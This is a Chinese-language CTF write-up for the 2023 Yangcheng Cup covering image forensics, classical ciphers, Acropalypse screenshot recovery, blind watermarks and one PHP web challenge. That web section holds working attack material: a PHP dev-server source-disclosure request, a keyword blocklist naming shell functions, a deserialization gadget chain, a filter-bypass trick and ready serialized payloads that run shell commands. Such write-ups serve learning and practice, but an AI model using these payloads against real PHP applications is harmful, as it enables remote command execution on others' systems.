2023年“羊城杯”网络安全大赛 题解报告

发布于 2023-09-03


ai和nia的交响曲

追踪流量,得到flag1.png和flag2.zip

flag1.png

flag1

flag2.zip: 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

EZ_misc

拿到图片,修改宽高

image-20230902113410308

binwalk分析

image-20230902133249585

里面藏着一个zip,但文件头被改成了504b0403,改回正常的504b0304后解压,得到一个文本文档

vzbtrvplnnvphsqkxsiqibroou

同时winhex里还有一个hint:fivenumbers

image-20230902113539917

由文件名feld.txt可知,这个是格罗斯费尔德密码(Gronsfeld cipher)

使用 karma9874/CryptAnalysis(GitHub 上的古典密码分析工具,含 Gronsfeld Cipher 模块)破解

得到klen 5 key - [28303] TRYTOTHINKTHESNIPPINGTOOLS

image-20230902132808530

明文里的关键词"截图工具"(SNIPPING TOOLS)加上密钥28303,稍微查一下就能对应到CVE-2023-28303漏洞(Windows截图工具的Acropalypse漏洞)

首先回来爆破一下原图片宽高

import zlib
import struct
import argparse
import itertools


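# IHDR chunk layout (byte offsets into the file, per the PNG spec):
#   8..12  chunk length (always 13)
#  12..16  chunk type "IHDR"
#  16..20  width,  big-endian uint32
#  20..24  height, big-endian uint32
#  24..29  bit depth, colour type, compression, filter, interlace
#  29..33  CRC32 over chunk type + chunk data (bytes 12..29)
IHDR_TYPE_START = 12
IHDR_WIDTH_START = 16
IHDR_TRAILER_START = 24
IHDR_DATA_END = 29
IHDR_CRC_END = 33

# Upper bound (inclusive) for the width/height search. The fields can hold up to
# 0xFFFFFFFF, but 0x0FFF (4095) already covers realistic screen sizes and keeps
# the ~16M-pair search affordable on a CPU.
DEFAULT_MAX_DIM = 4095


def read_ihdr_crc(bin_data):
    """Return (computed_crc, stored_crc) for the IHDR chunk of a PNG byte string.

    The CRC covers the chunk type ("IHDR", bytes 12..16) and the 13 data bytes
    (16..29); the value stored in the file sits in bytes 29..33.

    Args:
        bin_data: the raw PNG file contents.

    Returns:
        A (computed, stored) tuple of unsigned 32-bit ints; they differ when the
        IHDR bytes (typically width/height) were edited without fixing the CRC.

    Raises:
        ValueError: if the data is too short to contain a full IHDR chunk.
    """
    if len(bin_data) < IHDR_CRC_END:
        raise ValueError("file too short to contain a PNG IHDR chunk")
    computed = zlib.crc32(bin_data[IHDR_TYPE_START:IHDR_DATA_END])
    stored = int.from_bytes(bin_data[IHDR_DATA_END:IHDR_CRC_END], "big")
    return computed, stored


def brute_force_dimensions(bin_data, max_dim=DEFAULT_MAX_DIM):
    """Search width/height pairs in [0, max_dim] whose IHDR CRC equals the stored one.

    Only the two dimension fields are varied; the chunk type, bit depth, colour
    type and the remaining IHDR bytes are taken from the file unchanged. The
    range is inclusive, so max_dim itself is tried (the original loop stopped
    one short of its advertised 4095).

    Args:
        bin_data: the raw PNG file contents.
        max_dim: largest width/height tried, inclusive.

    Returns:
        The first matching (width, height) pair, or None if nothing in range matches.

    Raises:
        ValueError: if the data is too short to contain a full IHDR chunk.
    """
    _, stored = read_ihdr_crc(bin_data)
    chunk_type = bin_data[IHDR_TYPE_START:IHDR_WIDTH_START]
    trailer = bin_data[IHDR_TRAILER_START:IHDR_DATA_END]
    # zlib.crc32 accepts a running value, so the constant prefix is hashed once,
    # each width once, and only the height+trailer bytes once per pair.
    crc_prefix = zlib.crc32(chunk_type)
    tails = [struct.pack(">I", height) + trailer for height in range(max_dim + 1)]
    for width in range(max_dim + 1):
        crc_width = zlib.crc32(struct.pack(">I", width), crc_prefix)
        for height, tail in enumerate(tails):
            if zlib.crc32(tail, crc_width) == stored:
                return width, height
    return None


def main(argv=None):
    """CLI entry point: verify the IHDR CRC of a PNG and offer to brute-force its size.

    Args:
        argv: argument list for argparse; None means sys.argv[1:].

    Returns:
        Process exit status (0 on success or when the user declines, 1 if the
        brute force finds no match).
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("-f", type=str, default=None, required=True,
                        help="输入同级目录下图片的名称")
    args = parser.parse_args(argv)

    # Read once and close the handle; the whole file is needed for the slices anyway.
    with open(args.f, "rb") as fh:
        bin_data = fh.read()

    computed, stored = read_ihdr_crc(bin_data)
    if computed == stored:
        print('宽高没有问题!')
        return 0

    answer = input("宽高被改了, 是否CRC爆破宽高? (Y/n):")
    if answer not in ["Y", "y", ""]:
        return 0

    found = brute_force_dimensions(bin_data)
    if found is None:
        # Report explicitly instead of exiting silently when no pair in range matches.
        print(f"在 0..{DEFAULT_MAX_DIM} 范围内没有找到匹配的宽高")
        return 1
    width, height = found
    print(f"\nCRC32: {hex(stored)}")
    print(f"宽度: {width}, hex: {hex(width)}")
    print(f"高度: {height}, hex: {hex(height)}")
    return 0


if __name__ == "__main__":
    raise SystemExit(main())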
image-20230902135651627
CRC32: 0x9d223066
宽度: 356, hex: 0x164
高度: 138, hex: 0x8a

后来发现宽高爆破对这题并没有用,可以不用管

使用小工具frankthetank-music/Acropalypse-Multi-Tool: Easily detect and restore Acropalypse vulnerable PNG and GIF files with simple Python GUI. (github.com)爆破

*参考CTF 2023 の Misc の snippingTools のWP_Fab1an的博客-CSDN博客

image-20230902141120411

得到flag

image-20230902141444103
image-20230902141449111

程序猿Quby

image-20230902113803849

根据夏多密码,得到密文haveaniceday

image-20230902113821479
image-20230902113933662
image-20230902113939970

D0n't pl4y g4m3!!!

拦截302重定向,得到hint

image-20230902120452314
Ö_0 0vO Ow0 0w0 Ö_0 Ö_O Ö.O o_o 0.O OvO o.0 owo o.Ö Ö.Ö Ovo 0_Ö Ö_o owO O.0 owo Ö_o owO O.0 owo Ö_0 0wÖ O.0 0w0 Ö_0 OwO ov0 owo o_O O.Ö Övo 

使用在线工具得到解码后的hint

https://github.com/SnailSword/zdjd

image-20230902120640364

flag在/tmp/catcatf1ag.txt

利用PHP<=7.4.21 Development Server源码泄露漏洞读到p0p.php的PHP源码

PHP<=7.4.21 Development Server源码泄露漏洞_这周末在做梦的博客-CSDN博客

GET /p0p.php HTTP/1.1
Host: 20890.endpoint-2fd8419b2abc4a4fac2d7bdf59526c27.m.ins.cloud.dasctf.com:20890



GET / HTTP/1.1
image-20230902121508804
HTTP/1.1 200 OK
Host: 20890.endpoint-2fd8419b2abc4a4fac2d7bdf59526c27.m.ins.cloud.dasctf.com:20890
Date: Sat, 02 Sep 2023 04:14:39 GMT
Connection: close
Content-Length: 1444

<?php
// Redirect every visitor to an external page. header() does not stop execution,
// so the unserialize() handler further down still runs for each request.
header("HTTP/1.1 302 found");
header("Location:https://passer-by.com/pacman/");

/**
 * Gadget class: any read of an inaccessible property goes through __get(),
 * and string conversion of the object runs a shell command via __toString().
 */
class Pro{
    private $exp;
    private $rce2;

    // $rce2 here is a method-local variable, not $this->rce2, and it is never
    // assigned: this looks like a typo, and the resulting empty property name is
    // presumably rejected by PHP with an Error — verify before relying on it.
    public function __get($name)
    {
        return $this->$rce2=$this->exp[$rce2];
    }
    // Executes `cat /flag` whenever the object is used as a string.
    public  function __toString()
    {
            call_user_func('system', "cat /flag");
     }
}

/**
 * Gadget class: calling any method that does not exist on it lands in
 * __call(), which dispatches through the $now array to an arbitrary callable.
 * All properties used here ($key, $finish1, $finish, $now) are undeclared, i.e.
 * they come straight from the unserialized data.
 */
class Yang
{
    // $name is the missing method's name and $ary its arguments. The reads of
    // $this->finish1->name and $this->finish->finish are property accesses, so
    // when those properties hold objects with __get() that magic method decides
    // the outcome. call_user_func() then treats $now[$name] as a function name.
    public function __call($name, $ary)
    {
        if ($this->key === true || $this->finish1->name) {
            if ($this->finish->finish) {
                call_user_func($this->now[$name], $ary[0]);
            }
        }
    }
    // Clears $now and returns whatever $this->finish->finish evaluates to.
    public function ycb()
    {
        $this->now = 0;
        return $this->finish->finish;
    }
    // Runs right after unserialize() and forces $key to true.
    public function __wakeup()
    {
        $this->key = True;
    }
}
/**
 * Gadget class: reading a property that is not accessible from the caller
 * copies the same-named entry of $name onto the object and returns it.
 * Because $finish is private, a read of ->finish from outside this class
 * is routed through __get() and yields $name['finish'].
 */
class Cheng
{
    private $finish;
    public $name;
    public function __get($value)
    {

        return $this->$value = $this->name[$value];
    }
}
/**
 * Entry point of the chain: __destruct() fires when the unserialized object is
 * released. It calls ycb() on $CTF and then YCB1() on $fine; no class in this
 * file defines YCB1(), so on a Yang that call is handled by __call().
 * $CTF, $fine, $rce and $rce1 are all undeclared properties.
 */
class Bei
{
    public function __destruct()
    {
        if ($this->CTF->ycb()) {
            $this->fine->YCB1($this->rce, $this->rce1);
        }
    }
    // Runs right after unserialize() and forces $key to false.
    public function __wakeup()
    {
        $this->key = false;
    }
}

// Strips a fixed list of keywords (case-insensitive) from the raw POST body
// before it reaches unserialize(). preg_replace() removes each match once and
// does not re-scan the result, so this is a blocklist, not a safety boundary;
// the serialized string's s:N: length prefixes are also left untouched.
// A strict allow-list (unserialize()'s 'allowed_classes' option) or not
// unserializing user input at all is the appropriate control.
function prohib($a){
    $filter = "/system|exec|passthru|shell_exec|popen|proc_open|pcntl_exec|eval|flag/i";
    return preg_replace($filter,'',$a);
}

// Sink: unserialize() on the raw POST body with only the regex blocklist in
// front of it. Any class defined in this file may be instantiated from the
// payload, which makes the magic methods above reachable; restricting with
// unserialize($a, ['allowed_classes' => false]) would remove that. Note that
// $_POST["CTF"] is read before isset() checks it, so a missing key warns.
$a = $_POST["CTF"];
if (isset($a)){
  unserialize(prohib($a));
}
?>
# ./有hint.zip

接下来构造反序列化链

<?php
// header("HTTP/1.1 302 found");
// header("Location:https://passer-by.com/pacman/");

/**
 * Local copy of the server-side Pro class, kept so serialize() emits the same
 * class name and the private-property name prefixes. Its __get() is not
 * triggered in this script because `name` is set as a real dynamic property.
 */
class Pro{
    private $exp;
    private $rce2;

    // $rce2 is an unassigned method-local variable, not $this->rce2 (looks like
    // a typo; presumably an Error on an empty property name — verify).
    public function __get($name)
    {
        return $this->$rce2=$this->exp[$rce2];
    }
    // Executes `cat /flag` whenever the object is used as a string.
    public  function __toString()
    {
        call_user_func('system', "cat /flag");
    }
}

/**
 * Local copy of the server-side Yang class. Besides producing the serialized
 * form, its methods also run locally: when $bei1 is released at script end,
 * Bei::__destruct() calls ycb() and then the undefined YCB1(), which lands in
 * __call() below.
 */
class Yang
{
    // Dispatches a missing method name through the $now array. Here $key is
    // never set (no __wakeup() without unserialize()), so the $finish1->name and
    // $finish->finish reads decide whether call_user_func() is reached.
    public function __call($name, $ary)
    {
        if ($this->key === true || $this->finish1->name) {
            if ($this->finish->finish) {
                call_user_func($this->now[$name], $ary[0]);
            }
        }
    }
    // Clears $now and returns whatever $this->finish->finish evaluates to.
    public function ycb()
    {
        $this->now = 0;
        return $this->finish->finish;
    }
    // Only runs on unserialize(); not exercised by this script.
    public function __wakeup()
    {
        $this->key = True;
    }
}
/**
 * Local copy of the server-side Cheng class. $finish is private, so
 * ->finish read from another class goes through __get() and returns
 * $name['finish'] — the value set in the chain built below.
 */
class Cheng
{
    private $finish;
    public $name;
    public function __get($value)
    {

        return $this->$value = $this->name[$value];
    }
}
/**
 * Local copy of the server-side Bei class; the root object of the serialized
 * graph. Its __destruct() fires locally too when $bei1 goes out of scope at the
 * end of this script, so the chain is walked once here as well.
 */
class Bei
{
    public function __destruct()
    {
        if ($this->CTF->ycb()) {
            $this->fine->YCB1($this->rce, $this->rce1);
        }
    }
    // Only runs on unserialize(); not exercised by this script.
    public function __wakeup()
    {
        $this->key = false;
    }
}

// Copy of the server-side keyword filter. It is defined but never called in
// this script; the length adjustment below is what accounts for its effect.
function prohib($a){
    $filter = "/system|exec|passthru|shell_exec|popen|proc_open|pcntl_exec|eval|flag/i";

    return preg_replace($filter,'',$a);
}
// Build the object graph and print its serialized form. Only property names,
// visibility and values shape the output; the class methods above are not
// needed for serialize() itself (though __destruct() still fires at exit).
$bei1 = new Bei();
$bei1->CTF = new Yang();
$bei1->CTF->finish = new Cheng();
// Cheng::__get() returns $name['finish'], so ->finish->finish evaluates to true.
$bei1->CTF->finish->name = array("finish"=>true);

$bei1->fine = new Yang();
$bei1->rce = "cat /tmp/catcatf1ag.txt";

// `name` is set as a real dynamic property here, so Pro::__get() is never hit.
$bei1->fine->finish1 = new Pro();
$bei1->fine->finish1->name = true;
$bei1->fine->finish = new Cheng();
$bei1->fine->finish->name = array("finish"=>true);

// Written as a 12-byte string; the server-side filter removes the inner match
// and leaves a 6-byte one, hence the length-prefix rewrite from 12 to 6 below.
$bei1->fine->now = array("YCB1"=>"ssystemystem");
$a =  serialize($bei1);
// Caveat: str_replace() rewrites every "12" in the output, not only the s:12:
// prefix of that one string, so any other "12" in the payload is corrupted too.
$a = str_replace("12","6",$a);
echo $a;
?>

不知道为什么郑佬的exp只有郑佬自己电脑能跑,我吃现成的就跑不了

不劳而获饭好吃吗?非常好吃

CTF=O:3:"Bei":3:{s:3:"CTF";O:4:"Yang":1:{s:6:"finish";O:5:"Cheng":2:{s:13:"+Cheng+finish";N;s:4:"name";a:1:{s:6:"finish";b:1;}}}s:4:"fine";O:4:"Yang":3:{s:7:"finish1";O:3:"Pro":3:{s:8:"+Pro+exp";N;s:9:"+Pro+rce2";N;s:4:"name";b:1;}s:6:"finish";O:5:"Cheng":2:{s:13:"+Cheng+finish";N;s:4:"name";a:1:{s:6:"finish";b:1;}}s:3:"now";a:1:{s:4:"YCB1";s:6:"syssystemtem";}}s:3:"rce";s:23:"cat+/tmp/catcatf1ag.txt";}

O:3:"Bei":3:{s:3:"CTF";O:4:"Yang":1:{s:6:"finish";O:5:"Cheng":2:{s:13:"Chengfinish";N;s:4:"name";a:1:{s:6:"finish";b:1;}}}s:4:"fine";O:4:"Yang":3:{s:7:"finish1";O:3:"Pro":3:{s:8:"Proexp";N;s:9:"Prorce2";N;s:4:"name";b:1;}s:6:"finish";O:5:"Cheng":2:{s:13:"Chengfinish";N;s:4:"name";a:1:{s:6:"finish";b:1;}}s:3:"now";a:1:{s:4:"YCB1";s:6:"syssystemtem";}}s:3:"rce";s:2:"ls";}
image-20230902124359344

Matryoshka

首先做下取证

image-20230902155728500

拿到取证报告和相关资源文件

image-20230902155835171

压缩文件里的注释提示有盲水印

image-20230902160311517
image-20230902160228066
image-20230902155842039

binwalk拆不出来,文件体积却大了好几倍,盲水印没跑了,先上Stegsolve看看

image-20230902160209894

有数据在,拿BlindWaterMark解一下,得到flag

bwm.py decode not_real_cat.jpg 0000005_Carved.jpg flag.png

image-20230902161413095
image-20230902161520676

若金色的阳光停止了它耀眼的光芒,你的一个微笑,将照亮我的整个世界